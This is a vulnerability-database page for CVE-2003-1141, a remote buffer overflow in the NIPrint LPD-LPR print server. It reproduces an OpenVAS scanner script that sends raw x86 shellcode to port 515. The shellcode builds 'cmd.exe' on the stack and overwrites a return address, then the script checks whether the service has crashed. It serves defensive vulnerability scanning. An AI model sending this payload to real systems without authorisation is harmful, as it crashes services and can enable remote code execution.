Lucene search
K

NIPrint LPD-LPR Print Server

🗓️ 03 Nov 2005 00:00:00Reported by This script is Copyright (C) 2003 Matt NorthType 
openvas
 openvas
🔗 plugins.openvas.org👁 30 Views

A vulnerability in the NIPrint could allow an attacker to remotely overflow an internal buffer, leading to code execution

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2003-1141
25 Dec 201000:00
circl
CVE
CVE-2003-1141
10 May 200504:00
cve
Cvelist
CVE-2003-1141
10 May 200504:00
cvelist
Exploit DB
NIPrint LPD - Request Overflow (Metasploit)
25 Dec 201000:00
exploitdb
Metasploit
NIPrint LPD Request Overflow
12 Sep 200606:05
metasploit
canvas
Immunity Canvas: NIPRINT
4 Nov 200305:00
canvas
Tenable Nessus
NIPrint LPD-LPR Print Server String Handling Remote Overflow
17 Nov 200300:00
nessus
NVD
CVE-2003-1141
4 Nov 200305:00
nvd
OpenVAS
NIPrint LPD-LPR Print Server DoS Vulnerability
3 Nov 200500:00
openvas
Packet Storm
NIPrint LPD Request Overflow
26 Nov 200900:00
packetstorm
Rows per page
# OpenVAS Vulnerability Test
# $Id: niprint_dos.nasl 6053 2017-05-01 09:02:51Z teissa $
# Description: NIPrint LPD-LPR Print Server
#
# Authors:
# Matt North
#
# Copyright:
# Copyright (C) 2003 Matt North
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "A vulnerability in the NIPrint could allow an attacker to remotely 
overflow an internal buffer which could allow code execution.";

tag_solution = "None, Contact the vendor http://www.networkinstruments.com/products/niprint.html";

if(description) 
{ 
	script_id(11926); 
	script_version("$Revision: 6053 $");
	script_tag(name:"last_modification", value:"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $");
	script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
	script_cve_id("CVE-2003-1141");
	script_bugtraq_id(8968);
	script_xref(name:"OSVDB", value:"2774");
    script_tag(name:"cvss_base", value:"7.5");
    script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
        
      name = "NIPrint LPD-LPR Print Server"; 
      script_name(name); 

      summary = "Checks for vulnerable NIPrint";
	script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_vul");
	script_copyright("This script is Copyright (C) 2003 Matt North");
	family = "Denial of Service";
	script_family(family);

 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
	exit(0);
}

port = 515;
if (! get_port_state(port)) exit(0);

r = raw_string( 0x90,0xCC,0x90,0x90,0x90,0x90,0x8B,0xEC,0x55,0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xC6,0x45,0xF8,0x63
,0xC6, 0x45, 0xF9, 0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,
0xC6,0x45,0xFE,0x65,0xB8,0xC3,0xAF,0x01,0x78,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4,0x5F);

r1 = raw_string( 0xCC, 0x83,0xC4,0x04, 0xFF,0xE4);
r2 = string(crap(43));
r3 = raw_string( 0xcb, 0x50, 0xf9, 0x77);
bo = r + r1 + r2 + r3;

soc = open_priv_sock_tcp(dport: port);
if(!soc) exit(0);

send(socket:soc,data:bo);

close(soc);
alive = open_priv_sock_tcp(dport: port);
if (!alive) security_message(port);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 May 2017 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.78728
30